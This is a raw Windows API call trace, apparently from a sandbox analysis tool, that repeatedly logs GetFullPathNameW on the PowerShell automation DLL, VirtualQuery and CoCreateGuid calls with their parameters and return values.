0x74 [0062.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.630] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.630] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.630] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.631] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.631] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.631] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.632] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.632] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.632] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.632] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.632] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.633] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.633] VirtualQuery (in: lpAddress=0x24b940, lpBuffer=0x24c800, dwLength=0x30 | out: lpBuffer=0x24c800*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.633] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.634] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.634] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.634] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.634] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa7d9beb7, Data2=0x22b8, Data3=0x4f3f, Data4=([0]=0xb6, [1]=0xce, [2]=0x86, [3]=0x90, [4]=0x5a, [5]=0x18, [6]=0xf9, [7]=0x5f))) returned 0x0 [0062.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.635] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x7bcbef7b, Data2=0xe302, Data3=0x477b, Data4=([0]=0xb7, [1]=0x5f, [2]=0xce, [3]=0xb8, [4]=0xb9, [5]=0x67, [6]=0x13, [7]=0xfa))) returned 0x0 [0062.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.637] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.638] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.638] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.639] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.639] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.640] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.640] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.641] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.641] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bef0, 